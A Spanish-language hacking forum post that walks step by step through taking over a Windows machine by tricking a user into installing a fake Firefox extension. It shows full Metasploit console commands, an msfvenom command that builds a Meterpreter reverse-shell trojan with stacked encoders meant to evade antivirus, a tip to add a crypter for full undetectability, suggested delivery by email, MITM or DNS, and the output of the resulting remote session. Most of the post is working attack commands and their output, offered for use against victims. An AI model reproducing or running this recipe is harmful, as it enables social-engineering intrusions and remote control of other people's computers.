comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Comprometiendo un equipo mediante una extension de Firefox falsa

  • 0 Respuestas
  • 1897 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« en: Junio 01, 2012, 09:22:19 am »
Mediante ingeniería social intentaremos que un usuario instale una extensión de Firefox falsa para obtener una sesión remota en su sistema.

A través del módulo de Metasploit No tienes permisos para ver links. Registrate o Entra con tu cuenta, crearemos un fichero .xpi que será presentado a la víctima dentro de una página web. Cuando el usuario la visite, su navegador Firefox le preguntará si confía y desea instalar la extensión. Si el usuario hace clic en 'instalar' se ejecutará el payload con los permisos del usuario.

Haremos una simple demostración contra un Windows XP SP3.

1. Primero abrimos la consola de metasploit (msfconsole), actualizamos y cargamos el módulo correspondiente:



Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf  exploit(firefox_xpi_bootstrapped_addon) >

2. Ahora procedemos a configurar el addon:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf  exploit(firefox_xpi_bootstrapped_addon) > set addonname falso
addonname => falso
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.35
SRVHOST => 192.168.1.35
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80
SRVPORT => 80
msf  exploit(firefox_xpi_bootstrapped_addon) > set URIPATH fakeEx
URIPATH => fakeEx
msf  exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.35
LHOST => 192.168.1.35

3. A continuación preparamos nuestro payload para intentar que el AV no lo detecte. Primero con msfvenom:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
D:\metasploit4>ruby\bin\ruby.exe msf3\msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai --iterations 10 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c LHOST=192.168.1.35 > trojan.exe
[*] x86/jmp_call_additive succeeded with size 321 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 353 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 385 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 417 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 449 (iteration=5)

Luego tendréis que utilizar también otro crypter si queréis que vuestro payload sea lo más FuD posible... así que no cuesta nada modificar un stub y utilizar alguno de esos tan sexys que hay en la Red ;)

Después cargamos el payload para nuestro módulo:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf  exploit(firefox_xpi_bootstrapped_addon) > set PAYLOADFILE d:\\metasploit4\\trojan.exe
PAYLOADFILE => d:\metasploit4\trojan.exe
payload => windows/meterpreter/reverse_tcp

Y lanzamos el exploit:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf  exploit(firefox_xpi_bootstrapped_addon) > exploit
[*] Exploit running as background job.
msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] Started reverse handler on 192.168.1.35:4444
[*] Using URL: http://192.168.1.35:80/fakeEx
[*] Server started.

4. Ahora que tenemos todo funcionando sólo necesitamos que el usuario visite nuestra URL (correo, MITM, DNS, ...) y que instale la extensión falsa de Firefox:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] 192.168.1.35     firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...



Si cae en la trampa, obtendremos la sesión remota:



Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
[*] Sending stage (752128 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.35:15831) at 2012-05-28 19:11:57 +0200

msf  exploit(firefox_xpi_bootstrapped_addon) > sessions -i

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.168.1.35:4444 -> 192.168.1.35:15831 (192.168.1.35)

FUENTE: hackplayers
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

 

¿Te gustó el post? COMPARTILO!



Descubrir Contraseñas Ocultas Por Asteriscos del Navegador Firefox

Iniciado por Devilboy

Respuestas: 5
Vistas: 3406
Último mensaje Mayo 17, 2011, 01:50:47 am
por magicbone
Evadiendo HSTS en CHROME y FIREFOX con sslstrip2

Iniciado por denx0

Respuestas: 39
Vistas: 19053
Último mensaje Noviembre 30, 2016, 11:15:50 am
por HckH3x
Convierte tu Firefox 4 en una herramienta de hacking etico

Iniciado por GAM3 OV3R

Respuestas: 1
Vistas: 2011
Último mensaje Marzo 26, 2011, 11:24:19 pm
por ksha
Conseguir acceso a router CISCO mediante fuerza bruta.

Iniciado por Cl0udswX

Respuestas: 1
Vistas: 6023
Último mensaje Mayo 19, 2015, 05:07:27 pm
por Gabriela
FIRESSH - cliente ssh para firefox

Iniciado por LionSec

Respuestas: 1
Vistas: 1770
Último mensaje Noviembre 27, 2014, 05:02:12 am
por blackdrake